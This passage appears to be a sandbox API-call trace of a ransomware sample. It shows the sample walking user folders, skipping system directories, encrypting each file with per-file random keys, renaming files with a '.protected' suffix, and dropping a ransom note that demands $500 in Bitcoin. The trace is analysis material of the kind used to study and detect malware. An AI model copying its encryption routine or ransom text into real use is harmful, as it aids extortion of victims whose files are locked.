(lpFirst="Windows Live Mail.url", lpSrch=".zip") returned 0x0 [0091.974] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.974] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.974] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.975] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.975] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.975] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.975] CloseHandle (hObject=0xd4) returned 1 [0091.975] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.protected") returned 88 [0091.975] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.protected")) returned 1 [0091.976] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.976] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="Windows") returned 1 [0091.976] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="Program Files") returned 1 [0091.976] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="Program Files (x86)") returned 1 [0091.976] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="$Recycle.bin") returned 1 [0091.976] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="System Volume Information") returned 1 [0091.976] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 80 [0091.976] StrStrIW (lpFirst="Windows Live Spaces.url", lpSrch=".protected") returned 0x0 [0091.976] lstrcmpW (lpString1="Windows Live Spaces.url", lpString2="RESTORE_FILES.txt") returned 1 [0091.976] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.976] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.976] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.978] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 80 [0091.978] StrStrW (lpFirst="Windows Live Spaces.url", lpSrch=".txt") returned 0x0 [0091.978] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 80 [0091.978] StrStrW (lpFirst="Windows Live Spaces.url", lpSrch=".rar") returned 0x0 [0091.978] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 80 [0091.978] StrStrW (lpFirst="Windows Live Spaces.url", lpSrch=".zip") returned 0x0 [0091.979] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.979] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.979] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.980] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.980] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.980] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.980] CloseHandle (hObject=0xd4) returned 1 [0091.981] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.protected") returned 90 [0091.981] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.protected")) returned 1 [0091.981] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0091.981] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0091.981] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\RESTORE_FILES.txt") returned 74 [0091.981] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.982] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.982] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0091.982] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0091.982] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0091.983] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.983] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0091.983] CloseHandle (hObject=0xb4) returned 1 [0091.983] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0091.983] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0091.983] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\RESTORE_FILES.txt") returned 61 [0091.983] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0091.984] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.984] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0091.991] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0091.991] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0091.991] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.991] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0091.991] CloseHandle (hObject=0xa4) returned 1 [0091.992] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0091.992] lstrcmpiW (lpString1="Links", lpString2="Windows") returned -1 [0091.992] lstrcmpiW (lpString1="Links", lpString2="Program Files") returned -1 [0091.992] lstrcmpiW (lpString1="Links", lpString2="Program Files (x86)") returned -1 [0091.992] lstrcmpiW (lpString1="Links", lpString2="$Recycle.bin") returned 1 [0091.992] lstrcmpiW (lpString1="Links", lpString2="System Volume Information") returned -1 [0091.992] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links") returned 39 [0091.992] lstrcmpW (lpString1="Links", lpString2=".") returned 1 [0091.992] lstrcmpW (lpString1="Links", lpString2="..") returned 1 [0091.992] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*") returned 41 [0091.992] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0091.992] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.992] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.992] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.992] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.992] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.992] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\.") returned 41 [0091.992] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.992] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0091.992] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0091.992] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.992] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.992] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.992] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.992] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.992] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.992] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.992] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.992] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.992] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\..") returned 42 [0091.992] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.993] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.993] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0091.993] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0091.993] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.993] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.993] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.993] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.993] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0091.993] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0091.993] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0091.993] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0091.993] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0091.993] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini") returned 51 [0091.993] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0091.993] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0091.993] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.993] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.993] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.994] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini") returned 51 [0091.994] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0091.994] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini") returned 51 [0091.994] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0091.994] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini") returned 51 [0091.994] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0091.994] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x244, lpOverlapped=0x0) returned 1 [0091.994] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffdbc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.994] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x244, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x244, lpOverlapped=0x0) returned 1 [0091.994] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.995] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.995] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.995] CloseHandle (hObject=0xb4) returned 1 [0091.995] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini.protected") returned 61 [0091.995] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini.protected")) returned 1 [0092.038] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.038] lstrcmpiW (lpString1="Desktop.lnk", lpString2="Windows") returned -1 [0092.038] lstrcmpiW (lpString1="Desktop.lnk", lpString2="Program Files") returned -1 [0092.038] lstrcmpiW (lpString1="Desktop.lnk", lpString2="Program Files (x86)") returned -1 [0092.039] lstrcmpiW (lpString1="Desktop.lnk", lpString2="$Recycle.bin") returned 1 [0092.039] lstrcmpiW (lpString1="Desktop.lnk", lpString2="System Volume Information") returned -1 [0092.039] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk") returned 51 [0092.039] StrStrIW (lpFirst="Desktop.lnk", lpSrch=".protected") returned 0x0 [0092.039] lstrcmpW (lpString1="Desktop.lnk", lpString2="RESTORE_FILES.txt") returned -1 [0092.039] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.039] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.039] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.044] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk") returned 51 [0092.044] StrStrW (lpFirst="Desktop.lnk", lpSrch=".txt") returned 0x0 [0092.044] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk") returned 51 [0092.044] StrStrW (lpFirst="Desktop.lnk", lpSrch=".rar") returned 0x0 [0092.044] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk") returned 51 [0092.044] StrStrW (lpFirst="Desktop.lnk", lpSrch=".zip") returned 0x0 [0092.044] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x1e6, lpOverlapped=0x0) returned 1 [0092.045] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe1a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.045] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1e6, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x1e6, lpOverlapped=0x0) returned 1 [0092.045] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.045] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 